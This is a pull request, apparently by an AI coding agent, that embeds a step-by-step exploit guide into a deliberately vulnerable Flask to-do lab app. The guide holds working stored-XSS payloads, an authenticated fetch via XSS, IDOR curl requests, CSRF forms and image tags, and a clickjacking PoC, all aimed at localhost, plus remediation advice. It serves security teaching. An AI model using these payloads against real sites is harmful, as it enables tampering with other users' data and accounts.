### PR TITLE
Embed exploit guide HTML in main file

### DIFF
--- a/RatDo.py
+++ b/RatDo.py
@@ -152,6 +152,253 @@ BASE = """
 </html>
 """
 
+GUIDE_HTML = """<h1 class='text-3xl font-extrabold mb-4'>RatTasks – Student Exploit Guide (Step‑by‑Step)</h1>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>**Educational use only.** These steps are designed for the RatTasks lab running on your own machine. Do not target systems you don’t own or don’t have explicit permission to test.</blockquote>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>0) Setup</h2>
+
+<p>1. Create a Python venv and install deps:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+   python3 -m venv venv &amp;&amp; source venv/bin/activate
+   pip install flask werkzeug
+</code></pre>
+<p>2. Run the app:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+   python app.py
+</code></pre>
+<p>3. Open **[http://127.0.0.1:5000](http://127.0.0.1:5000)**. Create an account and log in.</p>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>Tip: Keep DevTools → Network tab open to watch requests.</blockquote>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>1) Stored XSS in Task Title</h2>
+
+<p>**Vulnerability:** Task titles are rendered with `|safe`, so HTML/JS executes when the task list renders.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Steps</h3>
+
+<p>1. Log in.</p>
+<p>2. In the **Add task** input, paste any of the payloads below and click **Add**:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+   &lt;script&gt;alert(&#x27;XSS&#x27;)&lt;/script&gt;
+</code></pre>
+
+<p>   Alternative payloads (helpful if a naive `&lt;script&gt;` filter is later added):</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+   &lt;img src=x onerror=alert(&#x27;XSS&#x27;)&gt;
+   &lt;svg/onload=alert(&#x27;XSS&#x27;)&gt;
+   &lt;a href=javascript:alert(&#x27;XSS&#x27;)&gt;click me&lt;/a&gt;
+</code></pre>
+<p>3. Reload or navigate to `/` to trigger execution if needed.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>What you should observe</h3>
+
+<ul class="list-disc ml-6">
+<li>An alert pops up. That’s **stored XSS** because your payload is saved to the DB and runs for anyone who views the list.</li>
+</ul>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Bonus: Using XSS to perform actions</h3>
+
+<p>Because the session cookie is automatically sent by the browser, your script can make **authenticated** requests even if the cookie is `HttpOnly`.</p>
+
+<p>Try editing your own task title via XHR/fetch from XSS:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+&lt;script&gt;
+fetch(&#x27;/edit/1&#x27;, {
+  method: &#x27;POST&#x27;,
+  headers: {&#x27;Content-Type&#x27;: &#x27;application/x-www-form-urlencoded&#x27;},
+  body: &#x27;title=HACKED+by+XSS&#x27;
+});
+&lt;/script&gt;
+</code></pre>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>Replace `1` with the actual task ID of **your** task. This demonstrates how XSS lets an attacker act as the victim.</blockquote>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>2) IDOR / Broken Access Control on Edit, Delete, Toggle</h2>
+
+<p>**Vulnerability:** The routes `/edit/&lt;id&gt;`, `/delete/&lt;id&gt;`, `/toggle/&lt;id&gt;` do **not** verify that the task belongs to the logged‑in user.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Prepare</h3>
+
+<ul class="list-disc ml-6">
+<li>Create **User A** and add a task.</li>
+<li>Log out, create **User B** and add a task.</li>
+<li>Note: Task IDs are global auto‑increment integers across all users.</li>
+</ul>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Find valid task IDs</h3>
+
+<p>1. While logged in as **User A**, try to open ids you don’t own using the edit page:</p>
+
+<p>   * Visit: `http://127.0.0.1:5000/edit/1`, `/edit/2`, `/edit/3`, … until you **don’t** see “Task not found” and instead see the **Edit task** form for a task that isn’t yours.</p>
+<p>   * This confirms the ID exists and is accessible.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Exploit: Edit someone else’s task (horizontal privilege escalation)</h3>
+
+<ul class="list-disc ml-6">
+<li>Using the edit form you just opened, change the title and save. You’ve modified another user’s task.</li>
+</ul>
+
+<p>**cURL version (replace `42` with the victim’s task id):**</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+curl -i -X POST \
+  -H &#x27;Content-Type: application/x-www-form-urlencoded&#x27; \
+  -b &#x27;session=&lt;YOUR_FLASK_SESSION_COOKIE&gt;&#x27; \
+  --data &#x27;title=Owned+by+User+A&#x27; \
+  http://127.0.0.1:5000/edit/42
+</code></pre>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>Get your `session` cookie from DevTools → Application → Cookies.</blockquote>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Exploit: Toggle someone else’s completion flag</h3>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+curl -i -b &#x27;session=&lt;YOUR_FLASK_SESSION_COOKIE&gt;&#x27; \
+  http://127.0.0.1:5000/toggle/42
+</code></pre>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>Exploit: Delete someone else’s task</h3>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+curl -i -b &#x27;session=&lt;YOUR_FLASK_SESSION_COOKIE&gt;&#x27; \
+  http://127.0.0.1:5000/delete/42
+</code></pre>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>The delete route does not verify ownership and always flashes “Task deleted” even if nothing happened — use `/edit/&lt;id&gt;` first to confirm the ID exists.</blockquote>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>What you should observe</h3>
+
+<ul class="list-disc ml-6">
+<li>You can modify, toggle, or delete tasks **you don’t own**. That’s an **IDOR/BAC** flaw.</li>
+</ul>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>3) CSRF on Add, Edit, Toggle, Delete</h2>
+
+<p>**Vulnerability:** There’s no CSRF protection. State‑changing endpoints accept requests with only the victim’s cookie for auth.</p>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>For the following, the victim must be **logged in** to RatTasks in the same browser.</blockquote>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>CSRF: Add a task (auto‑submit form)</h3>
+
+<p>Create a local HTML file (e.g., `csrf-add.html`) and open it in your browser while logged in to RatTasks:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+&lt;!doctype html&gt;
+&lt;form action=&quot;http://127.0.0.1:5000/&quot; method=&quot;POST&quot; id=&quot;f&quot;&gt;
+  &lt;input name=&quot;title&quot; value=&quot;CSRF injected task!&quot;&gt;
+&lt;/form&gt;
+&lt;script&gt;document.getElementById(&#x27;f&#x27;).submit();&lt;/script&gt;
+</code></pre>
+
+<p>**Result:** A new task appears in the victim account.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>CSRF: Delete a known task via `GET`</h3>
+
+<p>Because delete uses `GET`, an attacker can use an image tag:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+&lt;!doctype html&gt;
+&lt;img src=&quot;http://127.0.0.1:5000/delete/42&quot; style=&quot;display:none&quot;&gt;
+</code></pre>
+
+<p>**Result:** Visiting this page while logged in to RatTasks deletes task `42`.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>CSRF: Toggle a task via `GET`</h3>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+&lt;!doctype html&gt;
+&lt;img src=&quot;http://127.0.0.1:5000/toggle/42&quot; style=&quot;display:none&quot;&gt;
+</code></pre>
+
+<p>**Result:** Task `42` flips between done/undone.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>CSRF: Edit via POST</h3>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+&lt;!doctype html&gt;
+&lt;form action=&quot;http://127.0.0.1:5000/edit/42&quot; method=&quot;POST&quot; id=&quot;f&quot;&gt;
+  &lt;input name=&quot;title&quot; value=&quot;CSRF changed your title&quot;&gt;
+&lt;/form&gt;
+&lt;script&gt;f.submit();&lt;/script&gt;
+</code></pre>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>4) Clickjacking (No Frame Protections)</h2>
+
+<p>**Vulnerability:** No `X-Frame-Options` or CSP → pages can be iframed and overlaid with deceptive UI.</p>
+
+<h3 class='text-xl font-semibold mt-4 mb-2'>PoC</h3>
+
+<p>Create `clickjack.html` and open it while logged in:</p>
+
+<pre class="bg-slate-100 p-4 rounded overflow-x-auto"><code>
+&lt;!doctype html&gt;
+&lt;style&gt;
+  iframe { position: absolute; top:0; left:0; width:100vw; height:100vh; opacity:0.1; }
+  button.fake { position:absolute; top:120px; left:120px; padding:20px; }
+&lt;/style&gt;
+&lt;button class=&quot;fake&quot;&gt;Click here for FREE COFFEE ☕&lt;/button&gt;
+&lt;iframe src=&quot;http://127.0.0.1:5000/delete/42&quot;&gt;&lt;/iframe&gt;
+</code></pre>
+
+<p>**Result:** Clicking the visible button actually clicks the hidden delete link beneath it.</p>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>5) Recon Tips &amp; ID Discovery</h2>
+
+<ul class="list-disc ml-6">
+<li>**ID Guessing:** Since IDs are incremental, create a few tasks and note the growth (e.g., your first task might be 7, then 8, etc.). Older IDs likely belong to other accounts.</li>
+<li>**Existence Check:** `/edit/&lt;id&gt;` returns an edit form when the ID exists; otherwise you’ll see a “Task not found” flash. Use that to confirm valid IDs.</li>
+<li>**Network Tab:** Watch which endpoints the UI calls when you click **Edit**, **Delete**, or toggle the checkbox.</li>
+</ul>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>6) Suggested Write‑Up Structure (for reports)</h2>
+
+<p>1. **Title**: Stored XSS in Task Title leads to account actions via authenticated fetch</p>
+<p>2. **Summary**: Explain the impact and where the bug lives.</p>
+<p>3. **Steps to Reproduce**: Copy the exact steps/payloads above.</p>
+<p>4. **Impact**: Session‑authenticated actions; potential for persistent worm; user data manipulation.</p>
+<p>5. **Remediation**:</p>
+
+<p>   * Escape output; remove `|safe` unless output is pre‑sanitized.</p>
+<p>   * Add CSRF tokens to state‑changing routes; avoid `GET` for destructive actions.</p>
+<p>   * Verify ownership on all task mutations: `WHERE id = ? AND user_id = ?`.</p>
+<p>   * Add `X-Frame-Options: DENY` and a strict CSP.</p>
+
+<p>---</p>
+
+<h2 class='text-2xl font-bold mt-6 mb-3'>7) Quick Checklist (What to Demonstrate)</h2>
+
+<ul class="list-disc ml-6">
+<li>[ ] Add `&lt;script&gt;alert(1)&lt;/script&gt;` task → alert triggers on list view (Stored XSS).</li>
+<li>[ ] Use `/edit/&lt;id&gt;` to confirm other users’ task existence.</li>
+<li>[ ] Change another user’s task title via `/edit/&lt;id&gt;` (IDOR).</li>
+<li>[ ] Delete another user’s task via `/delete/&lt;id&gt;` (IDOR).</li>
+<li>[ ] Trigger CSRF add via auto‑submit form.</li>
+<li>[ ] Trigger CSRF delete/toggle via hidden `&lt;img&gt;`.</li>
+<li>[ ] Demonstrate clickjacking PoC.</li>
+</ul>
+
+<blockquote class='border-l-4 pl-4 italic text-slate-600'>That’s it. Keep your tests scoped to your own local RatTasks instance.</blockquote>"""
+
 # ------------------------ Routes: Auth ------------------------
 
 @app.route('/register', methods=['GET', 'POST'])
@@ -237,9 +484,7 @@ def logout():
 
 @app.route('/guide')
 def guide():
-    guide_path = Path(__file__).with_name('ExploitGuide.html')
-    guide_html = guide_path.read_text(encoding='utf-8')
-    body = f"<h1 class='text-3xl font-bold mb-6'>Explotation Guide</h1><div class='space-y-4'>{guide_html}</div>"
+    body = f"<h1 class='text-3xl font-bold mb-6'>Explotation Guide</h1><div class='space-y-4'>{GUIDE_HTML}</div>"
     return render_template_string(
         BASE,
         title=f"Explotation Guide • {APP_NAME}",


### PR DESCRIPTION
## Summary
- Inline the exploitation guide HTML directly into `RatDo.py`.
- Update the `/guide` route to serve the embedded guide instead of reading an external file.

## Testing
- `python -m py_compile RatDo.py`
- `python RatDo.py` *(fails: No module named 'flask')*
- `pip install flask werkzeug` *(fails: Could not connect to proxy)*

------
https://chatgpt.com/codex/tasks/task_b_68bd77d361b883298f3b54f1c74bc781